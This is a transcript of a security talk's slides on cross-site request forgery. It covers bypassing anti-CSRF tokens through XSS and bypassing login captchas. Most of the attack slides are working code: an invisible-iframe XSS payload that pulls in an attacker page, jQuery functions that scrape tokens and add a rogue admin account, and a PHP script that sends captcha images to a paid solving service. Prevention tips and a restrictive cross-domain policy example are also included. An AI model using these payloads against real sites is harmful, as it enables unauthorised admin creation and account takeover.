Cross Site Request Forgery Attacks
Cross Site Request Forgery Attacks Presentation Transcript

  • 1. Cross Site Request Forgery Attacks: security token bypass, captcha bypass. Presented by Vlad Horatiu [email_address]
  • 2. What is CSRF
  • 3. Context
    • We have:
      • Access to a web site that the victim is likely to visit
      • Cross Site Scripting (XSS) on the domain where the victim holds elevated privileges
  • 4. Basic principle
    • The victim visits the site we control
    • Through JavaScript delivered via the XSS, the victim's browser sends requests to the location where the victim has access.
  • 5. Why do we need XSS?
    • Modern browsers allow AJAX requests, as well as access to a page's HTML source, only as long as both the request and its target are on the same domain.
    • This protection only restricts access to the source of a page on another domain; it has no effect on loading that page (e.g. in an iframe)
    • Why?
      • Security
      • Implications for web advertising
  • 6. Starting the attack
    • Iframe from the site we control, pointing to the site with the XSS
      <html>
        <iframe src="http://victimsite.com/index.php?xss=<script>document.write('<iframe src='http://attacker');</script>"
                width="50" height="50"
                style="filter: alpha(opacity=0);-moz-opacity:0;opacity: .0;">
        </iframe>
      </html>
  • 7. Login check
      // Checks whether the victim is logged in by looking for a marker string in login.html
      function check() {
        $.get("login.html", function(data) {
          if (data.indexOf('blanaa') != -1) {
            var logged = tryToLogin();
          } else {
            var logged = true;
          }
        });
      };
      // Submits the login form loaded inside #form_frame
      function tryToLogin() {
        $.get("login.html", function(data) {
          $('#form_frame').contents().find('form').submit();
          return (data.indexOf('blanaa') != -1);
        });
      }
  • 8. Token bypass
    • Classic CSRF attack URL:
      • http://victimsite.com/admin/add_admin.php?user=1337hacker&pass=pwned
    • Valid link when token protection is in place:
      • http://victimsite.com/admin/add_admin.php?user=1337hacker&pass=pwned&token=693a93e07e1032751a2f14d00e33a56f
    • Code snippets (PHP):
      • Token generation:
          mysql_query("INSERT INTO `user_tokens` (`user_id`, `user_token`) VALUES ('". intval($uid) ."', '". sha1(mt_rand(1000000, 9999999).microtime(true)) ."')");
      • Token validation:
          $query = mysql_query("SELECT `user_token` FROM `user_tokens` WHERE `user_id` = '". intval($uid) ."' LIMIT 1");
          $token = getQueryToken($query);
          if ($_COOKIE['token'] != $token)
              die('Esti un bulangiu!');
  • 9. Token bypass
    • JavaScript token crawler
      function addAdmin() {
        $.get("http://victimsite.com/admin/add_user.php", function(data) {
          var token = getBetween('&token=', '&', data);
          alert(token);
          $.get("http://victimsite.com/admin/add_user_success.php?user=1337hacker&pass=pwned&token=" + token, function(data) {});
        });
      };
      // Returns the substring between the first occurrence of lft and the next rgt
      function getBetween(lft, rgt, string) {
        var split = '';
        split = string.split(lft);
        split = split[1];
        split = split.split(rgt);
        split = split[0];
        return split;
      }
  • 10. Token bypass
    • JavaScript token crawler (POST)
      function addAdmin() {
        $.get("http://victimsite.com/admin/add_user.php", function(data) {
          var token = getBetween('type="hidden" name="token" value="', '"', data);
          $.post("http://victimsite.com/admin/add_user.php",
                 { user: "1337hacker", pass: "pwned", token: token },
                 function(data) {});
        });
      };
      // Returns the substring between the first occurrence of lft and the next rgt
      function getBetween(lft, rgt, string) {
        var split = '';
        split = string.split(lft);
        split = split[1];
        split = split.split(rgt);
        split = split[0];
        return split;
      }
  • 11. Token bypass
    • Prevention methods
      • Protection against XSS attacks
      • Requiring a captcha for high-risk operations
      • Requiring the password for high-risk operations
      • Using private browsing
      • Setting sessions with a relatively short expiry
      • Writing the token in a way that is hard for a script to parse (for example, through obfuscated JavaScript)
  • 12. Token bypass
    • Disadvantages
      • Sensitive to changes in the HTML structure
  • 13. Flash cross-domain policy
    • Lets us make AJAX requests between two different domains
    • The destination domain must have the source domain in a "whitelist": crossdomain.xml
    • Example crossdomain.xml:
      <cross-domain-policy>
        <allow-access-from domain="*"/>
      </cross-domain-policy>
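The wildcard policy above lets Flash content from any origin send credentialed requests to the site and read the responses, which is what the captcha-bypass flow on the next slides relies on. As an added example, not from the slides, a restrictive crossdomain.xml that grants only one named origin over HTTPS (app.example.com is a placeholder):

```xml
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <!-- Only this master policy file is honoured; per-directory policy files cannot widen it -->
  <site-control permitted-cross-domain-policies="master-only"/>
  <!-- One named origin (placeholder), and only when the requesting content is served over HTTPS -->
  <allow-access-from domain="app.example.com" secure="true"/>
</cross-domain-policy>
```

If no cross-origin Flash access is needed at all, serving no crossdomain.xml (or one containing only the site-control element with permitted-cross-domain-policies="none") is the safer default.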
  • 14. Captcha bypass
    • Context
      • The user's username and password fields are filled in thanks to autocomplete
      • The login form requires captcha verification
    • Basic principle
      • Retrieving the image path via JavaScript
      • Sending the image to a captcha-breaking script (via crossdomain.xml)
      • Sending the login information
  • 15. Captcha bypass
    • Captcha breaking script snippet:
      // $client is a DeathByCaptcha_Client instance; the slide does not show its construction
      $rand = sha1(mt_rand(1000000, 9999999).microtime(true));
      if (isset($_GET['path']))
          file_put_contents($rand.'.jpg', file_get_contents($_GET['path']));
      if ($captcha = $client->upload($rand.'.jpg')) {
          echo "CAPTCHA {$captcha['captcha']} uploaded\n";
          sleep(DeathByCaptcha_Client::DEFAULT_TIMEOUT);
          if ($text = $client->get_text($captcha['captcha'])) {
              echo $text;
          } else {
              $client->remove($captcha['captcha']);
              echo '0';
          }
      }
  • 16. Captcha bypass
    • Disadvantages
      • The long time needed to solve the captcha
        • For the method to work, the user would have to stay on the page for at least a minute
      • The high cost of captcha solving
      • Changes in the HTML structure
      • Flash Player must be present on the victim's system
  • 17. Concrete examples
    • Adding users to a WordPress platform
    • Adding a MySQL user
  • 18. Questions